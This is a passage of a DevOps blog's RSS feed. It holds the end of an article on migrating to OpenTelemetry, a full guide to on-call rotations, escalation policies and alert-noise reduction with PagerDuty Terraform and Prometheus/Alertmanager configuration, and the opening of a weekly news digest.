<span class="hljs-attr">processors:</span>
  <span class="hljs-attr">batch:</span> {}
<span class="hljs-attr">exporters:</span>
  <span class="hljs-attr">debug:</span> {}
<span class="hljs-attr">service:</span>
  <span class="hljs-attr">pipelines:</span>
    <span class="hljs-attr">traces:</span>
      <span class="hljs-attr">receivers:</span> [<span class="hljs-string">otlp</span>]
      <span class="hljs-attr">processors:</span> [<span class="hljs-string">batch</span>]
      <span class="hljs-attr">exporters:</span> [<span class="hljs-string">debug</span>]
</code></pre><p>Point one canary service at the collector via <code>OTEL_EXPORTER_OTLP_ENDPOINT</code>. Validate the data shape in the debug log. No production impact, no SLO risk.</p>
<p><strong>Days 15-30: fan-out to your real backend.</strong> Add your vendor&#39;s OTel exporter. Run it as a parallel write path to your existing agent. Diff the dashboards. If traces show up in Datadog through both paths and the counts match within 1%, you have proof.</p>
<p><strong>Days 30-60: kill the agent, one signal at a time.</strong> Start with traces (lowest dashboard surface area for most teams). Disable the vendor agent&#39;s tracing collection, leave its metrics and logs paths intact. Watch the trace dashboard for a week. If it stays steady, move metrics next, then logs.</p>
<p><strong>Days 60-90: standardize the collector config across the fleet.</strong> Pull the per-service collector YAMLs into a shared Helm chart or Terraform module. Bake in the processors you actually need (PII redaction, tail sampling, k8s metadata enrichment). Add a regression test that fails CI if the collector config drifts.</p>
<p>By day 90 the canary service is fully on OTel, you&#39;ve retired the vendor agent on one service tier, and you have a reusable rollout recipe for the rest of the fleet.</p>
<h2 id="h2-what-this-doesnt-fix" class="group relative scroll-mt-24">
        <a href="#h2-what-this-doesnt-fix" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What this doesn't fix
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-what-this-doesnt-fix"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>OpenTelemetry graduating doesn&#39;t mean observability is solved. Three things it still doesn&#39;t address:</p>
<ul>
<li><strong>Backend pricing.</strong> Switching your shipping layer to OTel doesn&#39;t change what Datadog charges per host. You get optionality (you can swap backends later), not immediate cost savings.</li>
<li><strong>Cardinality explosion.</strong> OTel makes it easier than ever to instrument everything. If you add a <code>user_id</code> attribute to every span without sampling, your bill will go through the roof faster than before, just in OTLP format.</li>
<li><strong>Correlation across signals.</strong> OTel defines the formats. The actual cross-signal correlation (trace_id on a log, span_id on a metric exemplar) still depends on instrumentation discipline at each service. Graduation doesn&#39;t automatically wire your existing log lines into your traces.</li>
</ul>
<h2 id="h2-summary" class="group relative scroll-mt-24">
        <a href="#h2-summary" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Summary
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-summary"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>OpenTelemetry graduating from CNCF on May 21 is the formal signal that the standard-or-not debate is over. All three core signals are production-stable, the project&#39;s velocity is second only to Kubernetes, and every major observability backend now accepts OTLP. The realistic action for most teams: deploy the OTel Collector in shadow mode this quarter, validate against your existing pipeline, and retire one proprietary agent per signal over 90 days.</p>
<p>If you only do one thing this week, run <code>ps aux | grep -iE &#39;datadog|newrelic|splunkd|fluentd&#39;</code> on a production host and count what&#39;s still there. That&#39;s your retire list. The collector that replaces all of them is one Helm install away.</p>
<p>Sources:</p>
<ul>
<li><a href="https://www.cncf.io/announcements/2026/05/21/cloud-native-computing-foundation-announces-opentelemetrys-graduation-solidifying-status-as-the-de-facto-observability-standard/">CNCF announcement: OpenTelemetry graduates</a></li>
<li><a href="https://opentelemetry.io/docs/collector/">OpenTelemetry Collector docs</a></li>
<li><a href="https://docs.datadoghq.com/opentelemetry/">Datadog OTel ingestion docs</a></li>
</ul>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[How to Build an Effective On-Call Rotation and Escalation Policy]]></title>
      <link>https://devops-daily.com/posts/on-call-rotation-escalation-policy-guide</link>
      <description><![CDATA[Your phone buzzed at 3:14 AM for a disk warning that auto-resolved by 3:16. Nobody fixes the alert. The next person on rotation hates their life. Here is how to build on-call schedules, escalation policies, and alert rules that respect your engineers.]]></description>
      <pubDate>Mon, 25 May 2026 09:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/on-call-rotation-escalation-policy-guide</guid>
      <category><![CDATA[DevOps]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[incident-management]]></category><category><![CDATA[on-call]]></category><category><![CDATA[escalation]]></category><category><![CDATA[alert-fatigue]]></category><category><![CDATA[sre]]></category><category><![CDATA[devops]]></category><category><![CDATA[observability]]></category>
      <content:encoded><![CDATA[<p>Your phone buzzes at 3:14 AM. It is a <code>DiskUsageHigh</code> warning on a staging node. By the time you grab your laptop, it has auto-resolved. You go back to sleep, except now you are wide awake at 4 AM staring at the ceiling, knowing the next page might be a real incident. On Monday, you mention it in standup. Someone says &quot;yeah, that one fires all the time.&quot; Nobody opens a ticket. Next week the next person on rotation gets the same page.</p>
<p>This is how on-call rotations rot. Not from one bad incident, but from a slow leak of trust between engineers and the alerts they answer to. Building an on-call rotation that does not burn people out is a design problem, not a tooling problem. The tooling matters, but only after you decide what should wake a human up and what should not.</p>
<h2 id="h2-tldr" class="group relative scroll-mt-24">
        <a href="#h2-tldr" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          TLDR
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-tldr"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>A good on-call rotation has three pieces: a schedule that is fair and predictable, an escalation policy that catches dropped pages without spamming everyone, and an alert pipeline that only pages humans for things humans can act on right now. Get all three right and on-call becomes tolerable. Get any one wrong and people will quit.</p>
<h2 id="h2-prerequisites" class="group relative scroll-mt-24">
        <a href="#h2-prerequisites" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Prerequisites
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-prerequisites"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><ul>
<li>An alerting backend like Alertmanager, PagerDuty, Opsgenie, or Grafana OnCall</li>
<li>Prometheus or another metrics source that fires alerts</li>
<li>A team of at least four engineers (anything smaller and you are running a hero rotation, which is a separate problem)</li>
<li>Buy-in from your manager that on-call work is real work, not a side task</li>
</ul>
<h2 id="h2-step-1-design-the-schedule-before-you-pick-the-tool" class="group relative scroll-mt-24">
        <a href="#h2-step-1-design-the-schedule-before-you-pick-the-tool" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Step 1: Design the Schedule Before You Pick the Tool
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-step-1-design-the-schedule-before-you-pick-the-tool"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Most teams jump straight into PagerDuty and start clicking. Stop. Decide the shape of the rotation first.</p>
<p>The three common shapes:</p>
<ul>
<li><strong>Weekly rotation</strong>: one engineer carries the pager for 7 days. Simple, but brutal if your service is noisy. Good for low-volume rotations.</li>
<li><strong>Follow-the-sun</strong>: hand off every 8 to 12 hours across timezones. Best if you have engineers in at least two regions. Nobody gets paged at 3 AM.</li>
<li><strong>Split primary/secondary</strong>: a primary handles the page, a secondary backs them up if the primary misses it. Adds redundancy without doubling the load.</li>
</ul>
<p>For most teams between 5 and 15 engineers in one timezone, the right answer is a weekly rotation with a secondary on a separate, offset schedule. Here is what that looks like as Terraform with the PagerDuty provider:</p>
<pre><code class="hljs language-hcl"><span class="hljs-keyword">resource</span> <span class="hljs-string">&quot;pagerduty_schedule&quot;</span> <span class="hljs-string">&quot;primary_oncall&quot;</span> {
  name      = <span class="hljs-string">&quot;Platform Primary On-Call&quot;</span>
  time_zone = <span class="hljs-string">&quot;Europe/London&quot;</span>

  layer {
    name                         = <span class="hljs-string">&quot;Weekly Rotation&quot;</span>
    start                        = <span class="hljs-string">&quot;2026-06-01T09:00:00Z&quot;</span>
    rotation_virtual_start       = <span class="hljs-string">&quot;2026-06-01T09:00:00Z&quot;</span>
    rotation_turn_length_seconds = <span class="hljs-number">604800</span>  <span class="hljs-comment"># 7 days</span>
    users = [
      pagerduty_user.alice.id,
      pagerduty_user.bob.id,
      pagerduty_user.carol.id,
      pagerduty_user.dave.id,
      pagerduty_user.eve.id,
    ]
  }
}

<span class="hljs-keyword">resource</span> <span class="hljs-string">&quot;pagerduty_schedule&quot;</span> <span class="hljs-string">&quot;secondary_oncall&quot;</span> {
  name      = <span class="hljs-string">&quot;Platform Secondary On-Call&quot;</span>
  time_zone = <span class="hljs-string">&quot;Europe/London&quot;</span>

  layer {
    name                         = <span class="hljs-string">&quot;Offset Weekly Rotation&quot;</span>
    start                        = <span class="hljs-string">&quot;2026-06-04T09:00:00Z&quot;</span>  <span class="hljs-comment"># offset 3 days</span>
    rotation_virtual_start       = <span class="hljs-string">&quot;2026-06-04T09:00:00Z&quot;</span>
    rotation_turn_length_seconds = <span class="hljs-number">604800</span>
    users = [
      pagerduty_user.alice.id,
      pagerduty_user.bob.id,
      pagerduty_user.carol.id,
      pagerduty_user.dave.id,
      pagerduty_user.eve.id,
    ]
  }
}
</code></pre><p>The 3-day offset means the same person is never primary and secondary at the same time. It also means everyone gets a clear &quot;I am on&quot; week and a separate &quot;I am the backup&quot; week.</p>
<p>A few rules that prevent rotations from collapsing:</p>
<ul>
<li><strong>Publish the schedule at least 8 weeks ahead.</strong> People plan weddings, holidays, school pickups. Surprise shifts kill morale faster than the actual pages do.</li>
<li><strong>Let people swap shifts without asking permission.</strong> Build a Slack channel, not a request queue. The only rule should be &quot;find your own replacement before swapping.&quot;</li>
<li><strong>Pay for it, or give time off in lieu.</strong> Unpaid on-call is theft. If you cannot pay, give the on-call engineer a half-day off after a busy week.</li>
</ul>
<h2 id="h2-step-2-build-an-escalation-policy-that-actually-catches-drops" class="group relative scroll-mt-24">
        <a href="#h2-step-2-build-an-escalation-policy-that-actually-catches-drops" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Step 2: Build an Escalation Policy That Actually Catches Drops
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-step-2-build-an-escalation-policy-that-actually-catches-drops"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>A page that nobody answers is worse than no page at all, because the incident keeps burning while you have a false sense of &quot;someone is on it.&quot; Your escalation policy is the safety net.</p>
<p>The classic pattern: primary gets paged, has 5 minutes to acknowledge, then secondary, then a manager or incident commander.</p>
<pre><code class="hljs language-text">+---------------------+
|  Alert fires        |
+----------+----------+
           |
           v
+----------+----------+        +---------------------+
| Primary on-call     | -----&gt; | ACK within 5 min?   |
+----------+----------+        +----------+----------+
                                          | No
                                          v
                              +-----------+-----------+
                              | Secondary on-call     |
                              +-----------+-----------+
                                          |
                                          | No ACK in 10 min
                                          v
                              +-----------+-----------+
                              | Incident Commander    |
                              | or Engineering Manager|
                              +-----------------------+
</code></pre><p>Here is the same policy in Terraform:</p>
<pre><code class="hljs language-hcl"><span class="hljs-keyword">resource</span> <span class="hljs-string">&quot;pagerduty_escalation_policy&quot;</span> <span class="hljs-string">&quot;platform&quot;</span> {
  name      = <span class="hljs-string">&quot;Platform Escalation&quot;</span>
  num_loops = <span class="hljs-number">2</span>

  rule {
    escalation_delay_in_minutes = <span class="hljs-number">5</span>
    target {
      type = <span class="hljs-string">&quot;schedule_reference&quot;</span>
      id   = pagerduty_schedule.primary_oncall.id
    }
  }

  rule {
    escalation_delay_in_minutes = <span class="hljs-number">10</span>
    target {
      type = <span class="hljs-string">&quot;schedule_reference&quot;</span>
      id   = pagerduty_schedule.secondary_oncall.id
    }
  }

  rule {
    escalation_delay_in_minutes = <span class="hljs-number">15</span>
    target {
      type = <span class="hljs-string">&quot;user_reference&quot;</span>
      id   = pagerduty_user.engineering_manager.id
    }
  }
}
</code></pre><p>Three things worth calling out:</p>
<ol>
<li><strong>5 minutes to acknowledge is the sweet spot.</strong> Less than that and you escalate before someone has unlocked their phone. More than that and a real outage burns for too long before help arrives.</li>
<li><strong><code>num_loops = 2</code> means the policy retries.</strong> If the manager also misses it, it goes back to the primary. Without this, a sleeping team can drop a page entirely.</li>
<li><strong>The manager is a fallback, not the default.</strong> If your manager is getting paged regularly, your team is too small or your alerts are too noisy. Probably both.</li>
</ol>
<h2 id="h2-step-3-cut-alert-noise-ruthlessly" class="group relative scroll-mt-24">
        <a href="#h2-step-3-cut-alert-noise-ruthlessly" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Step 3: Cut Alert Noise Ruthlessly
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-step-3-cut-alert-noise-ruthlessly"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>This is where most on-call rotations live or die. The right number of pages per week per engineer is roughly <strong>0 to 2</strong>, and only one of those should happen outside business hours. If you are above that, you have a noise problem and no escalation policy will save you.</p>
<p>The fix is severity tiers. Not every alert deserves a phone call.</p>
<table>
<thead>
<tr>
<th>Severity</th>
<th>Action</th>
<th>Example</th>
</tr>
</thead>
<tbody><tr>
<td><code>page</code></td>
<td>Wake someone up</td>
<td>API error rate above 5% for 5 minutes</td>
</tr>
<tr>
<td><code>ticket</code></td>
<td>File a ticket</td>
<td>Disk at 80%, certificate expires in 14 days</td>
</tr>
<tr>
<td><code>info</code></td>
<td>Log only, no action</td>
<td>Deploy started, cache warmed</td>
</tr>
</tbody></table>
<p>Encode this in your Prometheus alert rules. Example:</p>
<pre><code class="hljs language-yaml"><span class="hljs-attr">groups:</span>
<span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">api-availability</span>
  <span class="hljs-attr">interval:</span> <span class="hljs-string">30s</span>
  <span class="hljs-attr">rules:</span>
  <span class="hljs-bullet">-</span> <span class="hljs-attr">alert:</span> <span class="hljs-string">APIHighErrorRate</span>
    <span class="hljs-attr">expr:</span> <span class="hljs-string">|
      (
        sum(rate(http_requests_total{job=&quot;api&quot;,status=~&quot;5..&quot;}[5m]))
        /
        sum(rate(http_requests_total{job=&quot;api&quot;}[5m]))
      ) &gt; 0.05
</span>    <span class="hljs-attr">for:</span> <span class="hljs-string">5m</span>
    <span class="hljs-attr">labels:</span>
      <span class="hljs-attr">severity:</span> <span class="hljs-string">page</span>
      <span class="hljs-attr">team:</span> <span class="hljs-string">platform</span>
    <span class="hljs-attr">annotations:</span>
      <span class="hljs-attr">summary:</span> <span class="hljs-string">&quot;API 5xx error rate above 5% for 5 minutes&quot;</span>
      <span class="hljs-attr">runbook:</span> <span class="hljs-string">&quot;https://runbooks.example.com/api-high-error-rate&quot;</span>
      <span class="hljs-attr">dashboard:</span> <span class="hljs-string">&quot;https://grafana.example.com/d/api-overview&quot;</span>

  <span class="hljs-bullet">-</span> <span class="hljs-attr">alert:</span> <span class="hljs-string">DiskSpaceWarning</span>
    <span class="hljs-attr">expr:</span> <span class="hljs-string">|
      (1 - (node_filesystem_avail_bytes{mountpoint=&quot;/&quot;} / node_filesystem_size_bytes{mountpoint=&quot;/&quot;})) &gt; 0.80
</span>    <span class="hljs-attr">for:</span> <span class="hljs-string">30m</span>
    <span class="hljs-attr">labels:</span>
      <span class="hljs-attr">severity:</span> <span class="hljs-string">ticket</span>
      <span class="hljs-attr">team:</span> <span class="hljs-string">platform</span>
    <span class="hljs-attr">annotations:</span>
      <span class="hljs-attr">summary:</span> <span class="hljs-string">&quot;Disk usage above 80% on <span class="hljs-template-variable">{{ $labels.instance }}</span>&quot;</span>
      <span class="hljs-attr">runbook:</span> <span class="hljs-string">&quot;https://runbooks.example.com/disk-space&quot;</span>
</code></pre><p>Then route on severity in Alertmanager. <code>page</code> goes to PagerDuty, <code>ticket</code> opens a Jira issue, <code>info</code> posts to a Slack channel nobody is required to read:</p>
<pre><code class="hljs language-yaml"><span class="hljs-attr">route:</span>
  <span class="hljs-attr">receiver:</span> <span class="hljs-string">slack-info</span>
  <span class="hljs-attr">group_by:</span> [<span class="hljs-string">&#x27;alertname&#x27;</span>, <span class="hljs-string">&#x27;cluster&#x27;</span>]
  <span class="hljs-attr">routes:</span>
  <span class="hljs-bullet">-</span> <span class="hljs-attr">matchers:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-string">severity=&quot;page&quot;</span>
    <span class="hljs-attr">receiver:</span> <span class="hljs-string">pagerduty-platform</span>
    <span class="hljs-attr">group_wait:</span> <span class="hljs-string">30s</span>
    <span class="hljs-attr">group_interval:</span> <span class="hljs-string">5m</span>
    <span class="hljs-attr">repeat_interval:</span> <span class="hljs-string">4h</span>

  <span class="hljs-bullet">-</span> <span class="hljs-attr">matchers:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-string">severity=&quot;ticket&quot;</span>
    <span class="hljs-attr">receiver:</span> <span class="hljs-string">jira-platform</span>
    <span class="hljs-attr">group_wait:</span> <span class="hljs-string">5m</span>

  <span class="hljs-bullet">-</span> <span class="hljs-attr">matchers:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-string">severity=&quot;info&quot;</span>
    <span class="hljs-attr">receiver:</span> <span class="hljs-string">slack-info</span>

<span class="hljs-attr">receivers:</span>
<span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">pagerduty-platform</span>
  <span class="hljs-attr">pagerduty_configs:</span>
  <span class="hljs-bullet">-</span> <span class="hljs-attr">service_key:</span> <span class="hljs-string">&lt;REDACTED&gt;</span>
    <span class="hljs-attr">description:</span> <span class="hljs-string">&#x27;{{ .CommonAnnotations.summary }}&#x27;</span>
    <span class="hljs-attr">details:</span>
      <span class="hljs-attr">runbook:</span> <span class="hljs-string">&#x27;{{ .CommonAnnotations.runbook }}&#x27;</span>
      <span class="hljs-attr">dashboard:</span> <span class="hljs-string">&#x27;{{ .CommonAnnotations.dashboard }}&#x27;</span>

<span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">jira-platform</span>
  <span class="hljs-attr">webhook_configs:</span>
  <span class="hljs-bullet">-</span> <span class="hljs-attr">url:</span> <span class="hljs-string">&#x27;https://jira-bot.example.com/create&#x27;</span>

<span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">slack-info</span>
  <span class="hljs-attr">slack_configs:</span>
  <span class="hljs-bullet">-</span> <span class="hljs-attr">api_url:</span> <span class="hljs-string">&#x27;https://hooks.slack.com/services/...&#x27;</span>
    <span class="hljs-attr">channel:</span> <span class="hljs-string">&#x27;#alerts-info&#x27;</span>
</code></pre><p>Two non-negotiable rules for any rule labelled <code>severity: page</code>:</p>
<ol>
<li><strong>It must link to a runbook.</strong> Not a wiki home page. A document with the actual commands to run. If you cannot write a runbook, the alert is not actionable enough to page on.</li>
<li><strong>It must include a <code>for:</code> clause of at least 2 minutes.</strong> This prevents flapping. The disk that fills to 81% for 30 seconds because of a log rotation should not wake you.</li>
</ol>
<h2 id="h2-step-4-review-pages-every-week" class="group relative scroll-mt-24">
        <a href="#h2-step-4-review-pages-every-week" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Step 4: Review Pages Every Week
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-step-4-review-pages-every-week"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The cheapest reliability work you can do is a weekly on-call review. 30 minutes, every Monday, with the off-going engineer talking through every page they got.</p>
<p>A simple template:</p>
<pre><code class="hljs language-text">On-Call Handover: 2026-05-18 to 2026-05-25
Engineer: Alice

Pages received: 4
  - Mon 02:14  APIHighErrorRate         REAL    fixed by rolling deploy
  - Tue 09:02  DiskSpaceWarning         NOISE   threshold too low, raised to 90%
  - Wed 04:33  PodCrashLoopBackOff      REAL    OOMKilled, increased memory limit
  - Sat 23:48  CertExpiryWarning        NOISE   renewal cron already running, ack window too short

Action items:
  1. Raise DiskSpaceWarning to 90% and move to severity=ticket (Alice, this week)
  2. Increase ack window on CertExpiryWarning from 5m to 30m (Bob, this week)
  3. Document OOM debug runbook (Carol, by next handover)
</code></pre><p>If an alert shows up as <code>NOISE</code> two weeks in a row, it gets fixed or it gets deleted. No exceptions. This is the single most important habit. Without it, your alert rules accumulate noise the same way a closet accumulates clothes you never wear.</p>
<h2 id="h2-what-you-should-do-this-week" class="group relative scroll-mt-24">
        <a href="#h2-what-you-should-do-this-week" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What You Should Do This Week
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-what-you-should-do-this-week"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>You probably will not redesign your entire on-call setup tomorrow. Pick one of these and do it before Friday:</p>
<ol>
<li><strong>Pull last month of pages from PagerDuty.</strong> Count how many were real vs noise. If the noise ratio is over 30%, your team is being trained to ignore the pager.</li>
<li><strong>Add a <code>runbook</code> annotation to your top 5 noisiest alerts.</strong> Even a one-paragraph &quot;if you see this, check X and Y&quot; is enough to start.</li>
<li><strong>Add a secondary on-call schedule</strong> if you do not have one. Even if it is the same five people, the escalation safety net is worth it.</li>
<li><strong>Schedule a 30-minute weekly handover meeting.</strong> Block it on the calendar as recurring. Make it dead simple to attend, even from a phone in a coffee shop.</li>
</ol>
<p>On-call will never be fun. But it should not be the reason your best engineers polish their CVs. Treat it like a system that needs maintenance, not a tax you collect from junior engineers, and your retention numbers will thank you.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[DevOps Weekly Digest - Week 22, 2026]]></title>
      <link>https://devops-daily.com/news/2026-week-22</link>
      <description><![CDATA[⚡ Curated updates from Kubernetes, cloud native tooling, CI/CD, IaC, observability, and security - handpicked for DevOps professionals!]]></description>
      <pubDate>Mon, 25 May 2026 00:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/news/2026-week-22</guid>
      <category><![CDATA[DevOps News]]></category>
      <content:encoded><![CDATA[<blockquote>
<p>📌 <strong>Handpicked by DevOps Daily</strong> - Your weekly dose of curated DevOps news and updates!</p>
</blockquote>
<hr>
<h2 id="h2-kubernetes" class="group relative scroll-mt-24">
        <a href="#h2-kubernetes" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          ⚓ Kubernetes
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-kubernetes"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-why-kubernetes-policy-enforcement-happens-too-lateand-what-to-do-about-it" class="group relative scroll-mt-24">
        <a href="#h3-why-kubernetes-policy-enforcement-happens-too-lateand-what-to-do-about-it" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Why Kubernetes policy enforcement happens too late—and what to do about it
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-why-kubernetes-policy-enforcement-happens-too-lateand-what-to-do-about-it"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
